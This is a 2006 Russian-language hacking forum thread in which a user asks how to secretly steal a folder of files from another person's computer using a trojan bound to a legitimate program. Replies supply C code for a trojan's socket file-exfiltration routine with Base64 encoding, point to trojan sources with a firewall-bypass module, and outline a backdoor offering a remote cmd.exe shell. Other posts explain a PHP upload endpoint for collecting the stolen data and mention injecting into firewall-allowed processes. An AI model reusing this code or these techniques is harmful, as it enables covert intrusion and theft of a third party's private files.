Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.03.2006, 01:26
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
Слив инфы с чужого компа
Надо у одного чудака с компа слить себе папку с важными файлами через интернет (иначе нельзя). Есть возможность внедрить ему прогу, приклеенную к другой. С бекдором можно попробовать, но у него наверняка блокированы порты. Как решить эту задачу? Может, кто уже писал что-то подобное?
Был вариант как-то паковать, кодировать (типа Base64) и передавать постом на бесплатный хостинг.
1. Какие есть еще варианты?
2. Как скрипту (желательно php) получить файл и сохранить на сервере (есть стандартные средства или надо самому все писать?)
3. Если прийдется кодировать/раскодировать в Base64, как это сделать на php?
С заливной частью, думаю, проблем не будет.
|
|
|
18.03.2006, 21:21
|
|
Новичок
Регистрация: 05.02.2006
Сообщений: 13
Провел на форуме:
31506
Репутация:
0
|
|
большая папка?
нельзя сжать её rar-ом / zip-ом - чтобы один файл, а не папка вышла
и потом выслать архив на ящик.
незнаю что там да как
но вроде ты усложняешь сильно всё.
у него там сервер что-ли? как у него на компе php выполняться будит?
больше инфы давай
|
|
|
|
18.03.2006, 21:43
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609
Репутация:
239
|
|
Жора
Нормально он все объяснил
vvs777
Я так понимаю, Вас интересуют способы обхода фаервола.
Если у Вас есть навоки в программировании, обратите внимание на эту тему: http://www.security-teams.net/index.php?showtopic=3059.
Там в сорсах траяна можно обнаружить файл FuckFirewall.cpp - это то, что Вам нужно.
По поводу скачивания в Base64 - думаю администрация не сильно обидится, если я немного насорю
void DownloadFile(SOCKET Socket, char* FilePath)
{
HANDLE hFile = CreateFile(FilePath, GENERIC_READ, FILE_SHARE_READ, NULL,
OPEN_EXISTING, 0, 0);
if(hFile == INVALID_HANDLE_VALUE)
{
send(Socket, "- Failed\n", 9, 0);
return;
}
int Size = GetFileSize(hFile, 0);
HANDLE hReadBuff = GlobalAlloc(GMEM_FIXED, 54);
HANDLE hWriteBuff = GlobalAlloc(GMEM_FIXED, 74);
ULONG ddTemp;
wsprintf((char*)hWriteBuff, "+ Success. File size: %d bytes.\n", Size);
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);
for(int i = 0; i < Size / 54 + 1; i++)
{
ReadFile(hFile, hReadBuff, 54, &ddTemp, 0);
B64Encode(hReadBuff, ddTemp, hWriteBuff);
lstrcat((char*)hWriteBuff, "\n");
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);
}
GlobalFree(hReadBuff);
GlobalFree(hWriteBuff);
CloseHandle(hFile);
}
// base64.h
HANDLE B64EncodeAlloc(int BuffSize);
_stdcall B64CryptOneBlock(void* Block);
void B64Encode(void* hMem, int MemSize, void* hDest);
Функци base64 кодирования написаны на асме и занимают много метса, я залил их сюда:
https://drmist.ru/download/base64.cpp
Всего этого должно Вам хватить, чтобы собрать несложный троян со всеми необходимыми функциями.
Разумеется, если вы знаете, что делать с исходниками на C++ 
__________________
Никому нельзя верить...
|
|
|
|
18.03.2006, 22:02
|
|
Новичок
Регистрация: 05.02.2006
Сообщений: 13
Провел на форуме:
31506
Репутация:
0
|
|
паренёк нас рассудит...реально вы сильно заморочились.
|
|
|
|
18.03.2006, 23:01
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
До сих пор вижу такие посты - честно скажу, смеюсь.
#FUCK_FIREWALL - действительно тема. Наверное прокатит на Outpost 0.01 demo...
void DownloadFile(SOCKET Socket, char* FilePath)
{
HANDLE hFile = CreateFile(FilePath, GENERIC_READ, FILE_SHARE_READ, NULL,
OPEN_EXISTING, 0, 0);
if(hFile == INVALID_HANDLE_VALUE)
{
send(Socket, "- Failed\n", 9, 0);
return;
}
int Size = GetFileSize(hFile, 0);
HANDLE hReadBuff = GlobalAlloc(GMEM_FIXED, 54);
HANDLE hWriteBuff = GlobalAlloc(GMEM_FIXED, 74);
ULONG ddTemp;
wsprintf((char*)hWriteBuff, "+ Success. File size: %d bytes.\n", Size);
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);
for(int i = 0; i < Size / 54 + 1; i++)
{
ReadFile(hFile, hReadBuff, 54, &ddTemp, 0);
B64Encode(hReadBuff, ddTemp, hWriteBuff);
lstrcat((char*)hWriteBuff, "\n");
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);
}
GlobalFree(hReadBuff);
GlobalFree(hWriteBuff);
CloseHandle(hFile);
}
Код обалденный... Сверх приватный и нужный...
Да, много места, но всеже не столь много чтобы их нельзя было вынуть из OpenSSH для FreeBSD...
B64.CPP
Код:
/*
From openssh-3.1p1.tar.gz\openssh-3.1p1\openbsd-compat\base64.c
*/
/* original header */
/* $OpenBSD: base64.c,v 1.3 1997/11/08 20:46:55 deraadt Exp $ */
/*
* Copyright (c) 1996 by Internet Software Consortium.
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS
* ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE
* CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
* DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
* PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
* ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
* SOFTWARE.
*/
/*
* Portions Copyright (c) 1995 by International Business Machines, Inc.
*
* International Business Machines, Inc. (hereinafter called IBM) grants
* permission under its copyrights to use, copy, modify, and distribute this
* Software with or without fee, provided that the above copyright notice and
* all paragraphs of this notice appear in all copies, and that the name of IBM
* not be used in connection with the marketing of any product incorporating
* the Software or modifications thereof, without specific, written prior
* permission.
*
* To the extent it has a right to do so, IBM grants an immunity from suit
* under its patents, if any, for the use, sale or manufacture of products to
* the extent that such products are used for performing Domain Name System
* dynamic updates in TCP/IP networks by means of the Software. No immunity is
* granted for any product per se or for any other function of any product.
*
* THE SOFTWARE IS PROVIDED "AS IS", AND IBM DISCLAIMS ALL WARRANTIES,
* INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
* PARTICULAR PURPOSE. IN NO EVENT SHALL IBM BE LIABLE FOR ANY SPECIAL,
* DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER ARISING
* OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE, EVEN
* IF IBM IS APPRISED OF THE POSSIBILITY OF SUCH DAMAGES.
*/
#include <winsock.h>
//#define Assert(Cond) if (!(Cond)) abort()
#define Assert(Cond) //
static const char Base64[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static const char Pad64 = '=';
int Base64_Decode( char const *src, u_char *target, size_t targsize )
{
int tarindex, state, ch;
char *pos;
state = 0;
tarindex = 0;
while ((ch = *src++) != '\0')
{
if (isspace( ch )) continue;
if (ch == Pad64) break;
pos = strchr( Base64, ch );
if (pos == 0) return (-1);
switch (state)
{
case 0:
if (target)
{
if (tarindex >= targsize) return (-1);
target[tarindex] = (pos - Base64) << 2;
}
state = 1;
break;
case 1:
if (target)
{
if (tarindex + 1 >= targsize) return (-1);
target[tarindex] |= (pos - Base64) >> 4;
target[tarindex+1] = ((pos - Base64) & 0x0f)
<< 4 ;
}
tarindex++;
state = 2;
break;
case 2:
if (target)
{
if (tarindex + 1 >= targsize) return (-1);
target[tarindex] |= (pos - Base64) >> 2;
target[tarindex+1] = ((pos - Base64) & 0x03) << 6;
}
tarindex++;
state = 3;
break;
case 3:
if (target)
{
if (tarindex >= targsize) return (-1);
target[tarindex] |= (pos - Base64);
}
tarindex++;
state = 0;
break;
}
}
if (ch == Pad64)
{
ch = *src++;
switch (state)
{
case 0:
case 1: return (-1);
case 2:
for (; ch != '\0'; ch = *src++)
if (!isspace( ch )) break;
if (ch != Pad64) return (-1);
ch = *src++;
case 3:
for (; ch != '\0'; ch = *src++)
if (!isspace( ch )) return (-1);
if (target && target[tarindex] != 0) return (-1);
}
}
else
{
if (state != 0) return (-1);
}
return (tarindex);
}
int Base64_Encode( u_char const *src, size_t srclength, char *target, size_t targsize )
{
size_t datalength = 0;
u_char input[3];
u_char output[4];
int i;
while (2 < srclength)
{
input[0] = *src++;
input[1] = *src++;
input[2] = *src++;
srclength -= 3;
output[0] = input[0] >> 2;
output[1] = ((input[0] & 0x03) << 4) + (input[1] >> 4);
output[2] = ((input[1] & 0x0f) << 2) + (input[2] >> 6);
output[3] = input[2] & 0x3f;
Assert( output[0] < 64 );
Assert( output[1] < 64 );
Assert( output[2] < 64 );
Assert( output[3] < 64 );
if (datalength + 4 > targsize) return (-1);
target[datalength++] = Base64[output[0]];
target[datalength++] = Base64[output[1]];
target[datalength++] = Base64[output[2]];
target[datalength++] = Base64[output[3]];
}
if (0 != srclength)
{
input[0] = input[1] = input[2] = '\0';
for (i = 0; i < srclength; i++) input[i] = *src++;
output[0] = input[0] >> 2;
output[1] = ((input[0] & 0x03) << 4) + (input[1] >> 4);
output[2] = ((input[1] & 0x0f) << 2) + (input[2] >> 6);
Assert( output[0] < 64 );
Assert( output[1] < 64 );
Assert( output[2] < 64 );
if (datalength + 4 > targsize) return (-1);
target[datalength++] = Base64[output[0]];
target[datalength++] = Base64[output[1]];
if (srclength == 1) target[datalength++] = Pad64;
else
target[datalength++] = Base64[output[2]];
target[datalength++] = Pad64;
}
if (datalength >= targsize) return (-1);
target[datalength] = '\0';
return (datalength);
}
B64.H
Код:
/*
(C) KEZ
*/
// from openssh-3.1p1.tar.gz\openssh-3.1p1\openbsd-compat\base64.h
#ifndef _BASE64_H_INCLUDED_
#define _BASE64_H_INCLUDED_
// like php style
extern int Base64_Decode( char const *src, u_char *target, size_t targsize );
extern int Base64_Encode( u_char const *src, size_t srclength, char *target, size_t targsize );
#endif // _BASE64_H_INCLUDED_
долой кодинг! даешь кантер страйг! |
|
|
|
19.03.2006, 00:01
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609
Репутация:
239
|
|
kez
Меня не покидает чувство, что у Вас ко мне некого рода личная неприязнь )))
Или просто от прероды желание всех кругом опустить.
Предлогаю Вам написать что-нибудь свое и ставте туда хоть компоненты дельфовските, хоть чужой алгоритм (имхо не самой лучшей реализации). Степень приватности и нужности выберете самостоятельно. 
__________________
Никому нельзя верить...
|
|
|
|
19.03.2006, 01:29
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
Ой как все запущено...
Во первых я хорошо шарю в делфи но не в сях. За ссылки спасибо, пригодятся.
Я имел в виду что прога посылает файл на хостинг, на котором висит php скрипт.
Че-то меня бейс64 заломал сразу. Буду слать в виде =45=64=97... так легче кодить-декодить. Думал, есть в php стандартная функция как полученный в параметрах файл сохранить на диске. Слышал, что такая есть, но не видел как ее юзать.
|
|
|
|
19.03.2006, 13:11
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609
Репутация:
239
|
|
vvs777
1) В чем заключается проблема перевода из си в дельфи? могу попробовать объяснить - это не сложно.
2) Зачем =AA=BB=CC...., Если можно AABBCC...? кроме того, php прекрасно декодирует base64 - а данных передаваться будет значительно меньше, чем в hex'е.
3) Вы когда-нибудь заливали что-нить на webfile.ru? Это делается через специальный пост запрос. При этом файл сохраняется на сервере в /tmp, а скрипту передается параметр $_FILE["имя_переменной_в_пост_запр се"]. Это переменная - ассоциати(ви? - как правильно? )) )рованный двумерный массив, $_FILE[..]["size"] - размер файла, $_FILE[..]["error"] - код ошибки, $_FILE[..]["tmp_name"] - имя файла на сервере. Остается только скопировать его из /tmp куда вам нужно.
Что относительно программы - она должна послать специальный пост-запрос ( http://rfc.net/rfc2388.html - multipart/form-data). Вобще по ключевым словам "сокеты, multipart/form-data, POST" можно найти хорошее описание на русском.
Но лично я поступил бы так:
написал бекдур, запущенный на 2-х портах:
на первом - перенапревленный ввод/вывод из cmd.exe,
на втором - протокол такой: я шлю полный путь к файлу, троян отсылает его в base64. (а можно и вобще никак не закодированный или даже упакованный)
Написать клиент (если netcat кажется неудобным) не составит труда.
__________________
Никому нельзя верить...
|
|
|
|
20.03.2006, 10:19
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
Я недавно нарвался на пидерский комп кде мой трой не сработал потому, что порты перекрыты и еще и ход из всей сети через 1 ящик.
Сейчас мне это срочно надо сделать до четверга. Ошибки быть не должно.
Прога должна все делать сама. Может и Бейс сделаю.
Ps: Внедпрение в адресное пространство разрешенных файрволами прог - рулит.
Пока проблема - поток в библиотеке прерывается при закрытии программы, а должен завершиться культурно.
|
|
|
|
22.03.2006, 15:56
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
Короче сделал.
Только вот лажа. Текстовые вообще шлются без проблем. Послал xls (EXEL).
Скачал по фтп. Размер совпадает, но не открывается.
Прописал FC /B file.xls file_dn.xls и получил длинный лист
Код:
00000008: 00 20
00000009: 00 20
0000000A: 00 20
0000000B: 00 20
0000000C: 00 20
0000000D: 00 20
0000000E: 00 20
0000000F: 00 20
00000010: 00 20
(Везде где были 00 стало 20)
Как с этим бороться? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
